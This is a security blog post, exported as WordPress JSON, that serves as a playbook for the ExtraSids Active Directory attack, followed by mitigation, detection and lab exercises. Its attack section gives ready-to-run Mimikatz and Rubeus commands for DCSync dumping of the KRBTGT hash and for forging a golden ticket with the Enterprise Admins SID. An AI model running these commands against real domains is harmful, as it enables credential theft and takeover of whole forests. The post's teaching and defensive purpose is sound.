{"id":296,"date":"2025-02-25T00:00:00","date_gmt":"2025-02-24T23:00:00","guid":{"rendered":"https:\/\/kosokoking.com\/?p=296"},"modified":"2025-02-24T12:06:12","modified_gmt":"2025-02-24T11:06:12","slug":"extrasids-attacks-sid-history-exploitation","status":"publish","type":"post","link":"https:\/\/kosokoking.com\/index.php\/security\/extrasids-attacks-sid-history-exploitation\/","title":{"rendered":"ExtraSids Attacks: SID History Exploitation"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong>Overview<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The ExtraSids attack is a technique that allows an attacker to compromise a parent domain from a compromised child domain within the same <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/identity\/ad-ds\/plan\/understanding-the-active-directory-logical-model\" target=\"_blank\" rel=\"noopener\" title=\"\">Active Directory Forest<\/a>. This playbook provides a comprehensive guide for understanding, executing, and defending against this attack.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Key Concepts<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>SID History<\/strong>: An attribute used in migration scenarios to retain a user&#8217;s original SID when moved to a new domain.<\/li>\n\n\n\n<li><strong>SID Filtering<\/strong>: A protection mechanism that filters out authentication requests from domains in other forests across a trust.<\/li>\n\n\n\n<li><strong>Golden Ticket<\/strong>: A forged Kerberos ticket granting unrestricted access within an Active Directory domain.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Prerequisites<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To perform the ExtraSids attack, the following information is required:<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>KRBTGT hash for the child domain<\/li>\n\n\n\n<li>SID of the child domain<\/li>\n\n\n\n<li>Name of a target user in the child domain (can be non-existent)<\/li>\n\n\n\n<li>FQDN of the child domain<\/li>\n\n\n\n<li>SID of the Enterprise Admins group of the root domain<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Attack Execution<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 1: Gather Required Information<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Obtain the KRBTGT account&#8217;s NT hash using DCSync:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz # lsadump::dcsync \/user:CHILD_DOMAIN\\krbtgt<\/code><\/pre>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Get the child domain SID:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; Get-DomainSID<\/code><\/pre>\n\n\n\n<ol start=\"3\" class=\"wp-block-list\">\n<li>Obtain the Enterprise Admins group SID:<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; Get-DomainGroup -Domain PARENT_DOMAIN -Identity \"Enterprise Admins\"<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 2: Create Golden Ticket<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using Mimikatz:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz # kerberos::golden \/user:hacker \/domain:CHILD_DOMAIN \/sid:CHILD_DOMAIN_SID \/krbtgt:KRBTGT_HASH \/sids:ENTERPRISE_ADMINS_SID \/ptt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Using Rubeus:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Rubeus.exe golden \/rc4:KRBTGT_HASH \/domain:CHILD_DOMAIN \/sid:CHILD_DOMAIN_SID \/sids:ENTERPRISE_ADMINS_SID \/user:hacker \/ptt<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 3: Verify Ticket Creation<\/strong><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; klist<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 4: Exploit Access<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Test access by performing actions such as listing the C: drive of the parent domain&#8217;s DC or executing a DCSync attack:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\&gt; ls \\\\PARENT_DC\\c$<br><br>mimikatz # lsadump::dcsync \/user:PARENT_DOMAIN\\target_user<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Mitigation Strategies<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Implement SID Filtering on trust relationships<\/li>\n\n\n\n<li>Regularly audit and monitor privileged accounts<\/li>\n\n\n\n<li>Adopt the Enhanced Security Administrative Environment (ESAE) architecture<\/li>\n\n\n\n<li>Implement comprehensive security controls and conduct regular audits<\/li>\n\n\n\n<li>Consider implementing a &#8220;Red Forest&#8221; architecture<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Detection Methods<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Monitor for unusual SID History modifications<\/li>\n\n\n\n<li>Look for unexpected domain controller impersonation<\/li>\n\n\n\n<li>Implement advanced threat detection solutions for Active Directory<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Additional Resources<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/trusts\/\" target=\"_blank\" rel=\"noreferrer noopener\">The Hacker Recipes &#8211; Trusts<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/redcanaryco\/atomic-red-team\/blob\/master\/atomics\/T1134.005\/T1134.005.md\" target=\"_blank\" rel=\"noreferrer noopener\">Atomic Red Team &#8211; SID-History Injection<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.semperis.com\/blog\/how-to-defend-against-golden-ticket-attacks\/\" target=\"_blank\" rel=\"noreferrer noopener\">Defending Against Golden Ticket Attacks<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.cayosoft.com\/dcsync\/\" target=\"_blank\" rel=\"noreferrer noopener\">Understanding DCSync Attacks<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/redfoxsec.com\/blog\/domain-trusts-a-comprehensive-exploitation-guide\/\" target=\"_blank\" rel=\"noreferrer noopener\">Comprehensive Domain Trust Exploitation Guide<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.sentinelone.com\/blog\/windows-sid-history-injection-exposure-blog\/\" target=\"_blank\" rel=\"noreferrer noopener\">SID History Injection Exposure<\/a><\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Practical Exercises<\/strong><\/h2>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Set up a lab environment with a parent and child domain. Compromise the child domain and perform the ExtraSids attack.<\/li>\n\n\n\n<li>Implement SID Filtering on the trust between domains and attempt the attack again to observe mitigation effectiveness.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Remember to use this playbook for educational and authorized testing purposes only. Always obtain proper permissions before conducting security assessments in production environments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For more insightful and engaging write-ups, visit <a href=\"https:\/\/kosokoking.com\/\" target=\"_blank\" rel=\"noopener\" title=\"\">kosokoking.com<\/a> and stay ahead in the world of cybersecurity!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Discover how ExtraSids attacks exploit SID history to compromise parent domains and bypass security with detection and mitigation strategies.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[201,384,387,380,385,386,382,383,202,381],"class_list":["post-296","post","type-post","status-publish","format-standard","hentry","category-security","tag-active-directory-security","tag-ad-forest-compromise","tag-cybersecurity-defence","tag-domain-trusts","tag-enterprise-security","tag-extrasids-attack","tag-golden-ticket-attack","tag-kerberos-attacks","tag-privilege-escalation-2","tag-sid-history-exploitation"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/comments?post=296"}],"version-history":[{"count":2,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions"}],"predecessor-version":[{"id":298,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions\/298"}],"wp:attachment":[{"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/media?parent=296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/categories?post=296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kosokoking.com\/index.php\/wp-json\/wp\/v2\/tags?post=296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}